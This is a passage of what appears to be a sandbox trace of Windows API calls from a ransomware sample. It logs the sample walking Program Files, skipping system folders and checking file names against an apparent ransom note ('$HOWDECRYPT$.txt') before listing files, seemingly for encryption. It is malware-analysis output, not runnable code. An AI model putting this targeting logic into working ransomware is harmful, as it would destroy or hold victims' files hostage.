(lpString1="SIGNUP", lpString2="$Recycle.bin") returned 1 [0095.305] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.305] lstrcmpiW (lpString1="SIGNUP", lpString2="System Volume Information") returned -1 [0095.305] lstrlenW (lpString="System Volume Information") returned 25 [0095.305] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP") returned 45 [0095.305] lstrcmpW (lpString1="SIGNUP", lpString2=".") returned 1 [0095.305] lstrcmpW (lpString1="SIGNUP", lpString2="..") returned 1 [0095.305] GetProcessHeap () returned 0x2c0000 [0095.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0095.305] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*") returned 47 [0095.305] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0095.306] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.306] lstrlenW (lpString="Windows") returned 7 [0095.306] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.306] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.306] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.306] lstrlenW (lpString="System Volume Information") returned 25 [0095.306] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\.") returned 47 [0095.306] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.306] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.306] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.306] lstrlenW (lpString="Windows") returned 7 [0095.306] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.306] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.306] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.306] lstrlenW (lpString="System Volume Information") returned 25 [0095.306] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\..") returned 48 [0095.306] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.306] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.306] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.306] lstrcmpiW (lpString1="install.ins", lpString2="Windows") returned -1 [0095.306] lstrlenW (lpString="Windows") returned 7 [0095.306] lstrcmpiW (lpString1="install.ins", lpString2="$Recycle.bin") returned 1 [0095.306] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.307] lstrcmpiW (lpString1="install.ins", lpString2="System Volume Information") returned -1 [0095.307] lstrlenW (lpString="System Volume Information") returned 25 [0095.307] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 57 [0095.307] StrStrIW (lpFirst="install.ins", lpSrch=".spyhunter") returned 0x0 [0095.307] lstrcmpW (lpString1="install.ins", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.307] lstrcmpW (lpString1="install.ins", lpString2="_uninstalling_.png") returned 1 [0095.307] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 57 [0095.307] GetProcessHeap () returned 0x2c0000 [0095.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34ca58 [0095.307] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0095.307] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0095.307] FindClose (in: hFindFile=0x335f20 | out: hFindFile=0x335f20) returned 1 [0095.307] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\$HOWDECRYPT$.txt") returned 62 [0095.307] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\$HOWDECRYPT$.txt") returned 62 [0095.307] GetProcessHeap () returned 0x2c0000 [0095.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbe) returned 0x32d9a0 [0095.307] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0095.307] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.307] lstrcmpiW (lpString1="sqmapi.dll", lpString2="Windows") returned -1 [0095.308] lstrlenW (lpString="Windows") returned 7 [0095.308] lstrcmpiW (lpString1="sqmapi.dll", lpString2="$Recycle.bin") returned 1 [0095.308] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.308] lstrcmpiW (lpString1="sqmapi.dll", lpString2="System Volume Information") returned -1 [0095.308] lstrlenW (lpString="System Volume Information") returned 25 [0095.308] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 49 [0095.308] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".spyhunter") returned 0x0 [0095.308] lstrcmpW (lpString1="sqmapi.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.308] lstrcmpW (lpString1="sqmapi.dll", lpString2="_uninstalling_.png") returned 1 [0095.308] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 49 [0095.308] GetProcessHeap () returned 0x2c0000 [0095.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa4) returned 0x33d790 [0095.308] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0095.308] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.308] lstrcmpiW (lpString1="strand.exe", lpString2="Windows") returned -1 [0095.308] lstrlenW (lpString="Windows") returned 7 [0095.308] lstrcmpiW (lpString1="strand.exe", lpString2="$Recycle.bin") returned 1 [0095.308] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.308] lstrcmpiW (lpString1="strand.exe", lpString2="System Volume Information") returned -1 [0095.308] lstrlenW (lpString="System Volume Information") returned 25 [0095.308] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\strand.exe") returned 49 [0095.308] StrStrIW (lpFirst="strand.exe", lpSrch=".spyhunter") returned 0x0 [0095.308] lstrcmpW (lpString1="strand.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.308] lstrcmpW (lpString1="strand.exe", lpString2="_uninstalling_.png") returned 1 [0095.309] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\strand.exe") returned 49 [0095.309] GetProcessHeap () returned 0x2c0000 [0095.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa4) returned 0x33d840 [0095.309] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0095.309] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0095.309] FindClose (in: hFindFile=0x335ee0 | out: hFindFile=0x335ee0) returned 1 [0095.309] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\$HOWDECRYPT$.txt") returned 55 [0095.309] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\$HOWDECRYPT$.txt") returned 55 [0095.309] GetProcessHeap () returned 0x2c0000 [0095.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb0) returned 0x32a0b8 [0095.309] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0095.310] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0095.310] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="Windows") returned -1 [0095.310] lstrlenW (lpString="Windows") returned 7 [0095.310] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="$Recycle.bin") returned 1 [0095.310] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.310] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="System Volume Information") returned -1 [0095.310] lstrlenW (lpString="System Volume Information") returned 25 [0095.310] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services") returned 48 [0095.310] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2=".") returned 1 [0095.310] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2="..") returned 1 [0095.310] GetProcessHeap () returned 0x2c0000 [0095.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0095.311] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*") returned 50 [0095.311] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x335ee0 [0095.311] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.311] lstrlenW (lpString="Windows") returned 7 [0095.311] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.311] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.311] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.311] lstrlenW (lpString="System Volume Information") returned 25 [0095.311] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\.") returned 50 [0095.311] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.311] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.311] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.311] lstrlenW (lpString="Windows") returned 7 [0095.312] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.312] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.312] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.312] lstrlenW (lpString="System Volume Information") returned 25 [0095.312] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\..") returned 51 [0095.312] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.312] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.312] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.312] lstrcmpiW (lpString1="AS OLEDB", lpString2="Windows") returned -1 [0095.312] lstrlenW (lpString="Windows") returned 7 [0095.312] lstrcmpiW (lpString1="AS OLEDB", lpString2="$Recycle.bin") returned 1 [0095.312] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.312] lstrcmpiW (lpString1="AS OLEDB", lpString2="System Volume Information") returned -1 [0095.312] lstrlenW (lpString="System Volume Information") returned 25 [0095.312] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB") returned 57 [0095.312] lstrcmpW (lpString1="AS OLEDB", lpString2=".") returned 1 [0095.312] lstrcmpW (lpString1="AS OLEDB", lpString2="..") returned 1 [0095.312] GetProcessHeap () returned 0x2c0000 [0095.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0095.313] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*") returned 59 [0095.313] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0095.334] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.334] lstrlenW (lpString="Windows") returned 7 [0095.334] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.334] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.334] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.334] lstrlenW (lpString="System Volume Information") returned 25 [0095.334] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\.") returned 59 [0095.334] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.334] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.334] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.334] lstrlenW (lpString="Windows") returned 7 [0095.335] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.335] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.335] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.335] lstrlenW (lpString="System Volume Information") returned 25 [0095.335] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\..") returned 60 [0095.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.335] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.335] lstrcmpiW (lpString1="10", lpString2="Windows") returned -1 [0095.335] lstrlenW (lpString="Windows") returned 7 [0095.335] lstrcmpiW (lpString1="10", lpString2="$Recycle.bin") returned 1 [0095.335] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.335] lstrcmpiW (lpString1="10", lpString2="System Volume Information") returned -1 [0095.335] lstrlenW (lpString="System Volume Information") returned 25 [0095.335] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10") returned 60 [0095.335] lstrcmpW (lpString1="10", lpString2=".") returned 1 [0095.335] lstrcmpW (lpString1="10", lpString2="..") returned 1 [0095.335] GetProcessHeap () returned 0x2c0000 [0095.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0095.335] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*") returned 62 [0095.335] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0096.342] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.342] lstrlenW (lpString="Windows") returned 7 [0096.342] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.342] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.342] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.343] lstrlenW (lpString="System Volume Information") returned 25 [0096.343] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\.") returned 62 [0096.343] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.343] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.343] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.343] lstrlenW (lpString="Windows") returned 7 [0096.343] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.343] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.343] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.343] lstrlenW (lpString="System Volume Information") returned 25 [0096.343] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\..") returned 63 [0096.343] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.343] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.343] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.343] lstrcmpiW (lpString1="Cartridges", lpString2="Windows") returned -1 [0096.343] lstrlenW (lpString="Windows") returned 7 [0096.343] lstrcmpiW (lpString1="Cartridges", lpString2="$Recycle.bin") returned 1 [0096.343] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.343] lstrcmpiW (lpString1="Cartridges", lpString2="System Volume Information") returned -1 [0096.343] lstrlenW (lpString="System Volume Information") returned 25 [0096.343] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 71 [0096.343] lstrcmpW (lpString1="Cartridges", lpString2=".") returned 1 [0096.343] lstrcmpW (lpString1="Cartridges", lpString2="..") returned 1 [0096.343] GetProcessHeap () returned 0x2c0000 [0096.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0096.343] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*") returned 73 [0096.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0096.436] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.436] lstrlenW (lpString="Windows") returned 7 [0096.436] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.436] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.436] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.436] lstrlenW (lpString="System Volume Information") returned 25 [0096.436] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\.") returned 73 [0096.436] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.436] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.437] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.437] lstrlenW (lpString="Windows") returned 7 [0096.437] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.437] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.437] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.437] lstrlenW (lpString="System Volume Information") returned 25 [0096.437] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\..") returned 74 [0096.437] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.437] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.437] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.437] lstrcmpiW (lpString1="as80.xsl", lpString2="Windows") returned -1 [0096.437] lstrlenW (lpString="Windows") returned 7 [0096.437] lstrcmpiW (lpString1="as80.xsl", lpString2="$Recycle.bin") returned 1 [0096.437] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.437] lstrcmpiW (lpString1="as80.xsl", lpString2="System Volume Information") returned -1 [0096.437] lstrlenW (lpString="System Volume Information") returned 25 [0096.437] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 80 [0096.437] StrStrIW (lpFirst="as80.xsl", lpSrch=".spyhunter") returned 0x0 [0096.437] lstrcmpW (lpString1="as80.xsl", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.437] lstrcmpW (lpString1="as80.xsl", lpString2="_uninstalling_.png") returned 1 [0096.437] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 80 [0096.437] GetProcessHeap () returned 0x2c0000 [0096.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x342e00 [0096.437] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14a8) returned 0x2c310e0 [0096.437] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.437] lstrcmpiW (lpString1="as90.xsl", lpString2="Windows") returned -1 [0096.437] lstrlenW (lpString="Windows") returned 7 [0096.437] lstrcmpiW (lpString1="as90.xsl", lpString2="$Recycle.bin") returned 1 [0096.437] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.438] lstrcmpiW (lpString1="as90.xsl", lpString2="System Volume Information") returned -1 [0096.438] lstrlenW (lpString="System Volume Information") returned 25 [0096.438] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 80 [0096.438] StrStrIW (lpFirst="as90.xsl", lpSrch=".spyhunter") returned 0x0 [0096.438] lstrcmpW (lpString1="as90.xsl", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.438] lstrcmpW (lpString1="as90.xsl", lpString2="_uninstalling_.png") returned 1 [0096.438] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 80 [0096.438] GetProcessHeap () returned 0x2c0000 [0096.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x342ef0 [0096.438] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14b0) returned 0x2c310e0 [0096.438] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.438] lstrcmpiW (lpString1="Informix.xsl", lpString2="Windows") returned -1 [0096.438] lstrlenW (lpString="Windows") returned 7 [0096.438] lstrcmpiW (lpString1="Informix.xsl", lpString2="$Recycle.bin") returned 1 [0096.438] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.438] lstrcmpiW (lpString1="Informix.xsl", lpString2="System Volume Information") returned -1 [0096.438] lstrlenW (lpString="System Volume Information") returned 25 [0096.438] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 84 [0096.438] StrStrIW (lpFirst="Informix.xsl", lpSrch=".spyhunter") returned 0x0 [0096.438] lstrcmpW (lpString1="Informix.xsl", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.438] lstrcmpW (lpString1="Informix.xsl", lpString2="_uninstalling_.png") returned 1 [0096.438] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 84 [0096.438] GetProcessHeap () returned 0x2c0000 [0096.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x3553b0 [0096.438] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14b8) returned 0x2c310e0 [0096.438] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.438] lstrcmpiW (lpString1="msjet.xsl", lpString2="Windows") returned -1 [0096.438] lstrlenW (lpString="Windows") returned 7 [0096.438] lstrcmpiW (lpString1="msjet.xsl", lpString2="$Recycle.bin") returned 1 [0096.438] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.438] lstrcmpiW (lpString1="msjet.xsl", lpString2="System Volume Information") returned -1 [0096.439] lstrlenW (lpString="System Volume Information") returned 25 [0096.439] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 81 [0096.439] StrStrIW (lpFirst="msjet.xsl", lpSrch=".spyhunter") returned 0x0 [0096.439] lstrcmpW (lpString1="msjet.xsl", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.439] lstrcmpW (lpString1="msjet.xsl", lpString2="_uninstalling_.png") returned 1 [0096.439] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 81 [0096.439] GetProcessHeap () returned 0x2c0000 [0096.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x342b30 [0096.439] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c0) returned 0x2c310e0 [0096.439] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.439] lstrcmpiW (lpString1="sql2000.xsl", lpString2="Windows") returned -1 [0096.439] lstrlenW (lpString="Windows") returned 7 [0096.439] lstrcmpiW (lpString1="sql2000.xsl", lpString2="$Recycle.bin") returned 1 [0096.439] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.439] lstrcmpiW (lpString1="sql2000.xsl", lpString2="System Volume Information") returned -1 [0096.439] lstrlenW (lpString="System Volume Information") returned 25 [0096.439] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 83 [0096.439] StrStrIW (lpFirst="sql2000.xsl", lpSrch=".spyhunter") returned 0x0 [0096.439] lstrcmpW (lpString1="sql2000.xsl", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.439] lstrcmpW (lpString1="sql2000.xsl", lpString2="_uninstalling_.png") returned 1 [0096.439] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 83 [0096.439] GetProcessHeap () returned 0x2c0000 [0096.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34e8d8 [0096.439] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c8) returned 0x2c310e0 [0096.439] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.439] lstrcmpiW (lpString1="sql70.xsl", lpString2="Windows") returned -1 [0096.439] lstrlenW (lpString="Windows") returned 7 [0096.439] lstrcmpiW (lpString1="sql70.xsl", lpString2="$Recycle.bin") returned 1 [0096.439] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.439] lstrcmpiW (lpString1="sql70.xsl", lpString2="System Volume Information") returned -1 [0096.440] lstrlenW (lpString="System Volume Information") returned 25 [0096.440] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 81 [0096.440] StrStrIW (lpFirst="sql70.xsl", lpSrch=".spyhunter") returned 0x0 [0096.440] lstrcmpW (lpString1="sql70.xsl", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.440] lstrcmpW (lpString1="sql70.xsl", lpString2="_uninstalling_.png") returned 1 [0096.440] 